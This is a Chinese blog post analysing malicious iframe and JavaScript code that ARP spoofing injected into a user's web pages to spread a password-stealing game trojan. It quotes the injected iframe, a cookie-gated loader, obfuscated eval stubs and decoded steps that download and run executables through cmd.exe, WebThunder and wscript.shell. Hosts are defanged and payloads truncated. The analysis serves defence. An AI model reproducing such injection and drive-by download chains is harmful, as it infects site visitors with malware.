ARP病毒自动加入传播Trojan.PSW.Win32.OnlineGames的代码

简介: ARP病毒自动加入传播Trojan.PSW.Win32.OnlineGames的代码

前两天,一位网友反映他最近打开网页显示都是乱码。

让他把网页源代码传过来分析,发现网页首部被加入代码:

/---
<iframe src=hxxp://**.9**-*6*.in/n.js width=1 height=1></iframe>
---/

hxxp://**.9**-*6*.in/n.js 包含代码:
/---
document.writeln("<script>window.onerror=function(){return true;}<\/script>");
document.writeln("<script src=\"hxxp:\/\/**.9**-*6*.in\/S368\/NewJs2.js\"><\/script>");
document.writeln("<script>");
document.writeln("function StartRun(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"Cookie1=\" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition!= -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
document.writeln("document.write(\'<iframe width=0 height=0 src=\"hxxp:\/\/**.9**-*6*.in\/s368\/T368.htm\"><\/iframe>\');");
document.writeln("}");
document.writeln("}");
document.writeln("StartRun();");
document.writeln("<\/script>")
---/

hxxp://**.9**-*6*.in/S368/NewJs2.js 内容为:
/---
StrInfo =  "\x3c\x73\x63…(略)…\x74\x3e"
window["\x64\…(略)…\x74"]["\x77…(略)…\x65"](StrInfo);
---/

经过2次解密得到原始代码,功能是下载S368.exe,保存到 %windir%,文件由自定义函数
/---
function GnMs(n)
var numberMs = Math.random()*n;
return '~Temp'+Math.round(numberMs)+'.tmp';
---/
生成,即~Temp****.tmp,然后调用 cmd.exe /c 来运行。

hxxp://**.9**-*6*.in/s368/T368.htm 内容为:
/---
<script>
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};…(略)…123|eval'.split('|'),0,{}))
---/

经过2次解密得到原始代码:
/---
info =  "<script src=\"S368.jpg\"></script>"
document.write(info)
<script src="S368.jpg"></script>
---/

hxxp://**.9**-*6*.in/s368/S368.jpg 的内容为:
/---
eval(function(p,a,c,k,e,r){e=function(c){return(…(略)…|x55'.split('|'),0,{}))
---/

经过2次解密得到原始代码,功能是利用 WebThunder,通过IE打开网页 hxxp://c***k*1**.in/S368/downmm.html,通过 wscript.shell有exec 执行 IE缓存中的 S3682[1].exe。

hxxp://c***k*1**.in/S368/downmm.html 的内容为:
/---
<script>
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};…(略)…|eval'.split('|'),0,{}))
</script>
---/

经过2次解密得到原始代码:
/---
eval("document.writeln("<script src=\"S3682.exe\"><\/script>")")<script src="S3682.exe"></script>
<script src="S3682.exe"></script>
---/
-----------------------------------
©著作权归作者所有:来自51CTO博客作者PurpleEndurer的原创作品,请联系作者获取转载授权,否则将追究法律责任
ARP病毒自动加入传播Trojan.PSW.Win32.OnlineGames的代码
https://blog.51cto.com/endurer/5900029
相关文章
|
3月前
|
安全 网络协议
ARP病毒加的网址传播Trojan.PSW.Win32.OnlineGames.GEN等
ARP病毒加的网址传播Trojan.PSW.Win32.OnlineGames.GEN等
|
3月前
|
安全 网络协议 JavaScript
ARP病毒自动添加的网址利用ms07004EXP和MS0614EXP传播Worm.Win32.Delf.cc等
ARP病毒自动添加的网址利用ms07004EXP和MS0614EXP传播Worm.Win32.Delf.cc等
|
网络协议 安全 网络安全
|
网络协议 安全 网络架构
|
安全 网络协议 网络安全
|
网络协议 安全 Windows
|
网络协议 安全 数据安全/隐私保护
网站源文件被注入了iframe代码—ARP欺骗的木马病毒攻击
我就很纳闷,运行了4年的网站一直都好好的最近怎么出现病毒提示呢。职业习惯原因打开了网站的源代码查看,原来在网页源代码的头部被加入了iframe嵌套框架网页,该网页执行木马程序……按照常理我心中一寒:估计是服务器被人攻陷了,所有文件代码被加了此行代码,于是FTP上去,下载文件下来查看却没有该代码。
1638 0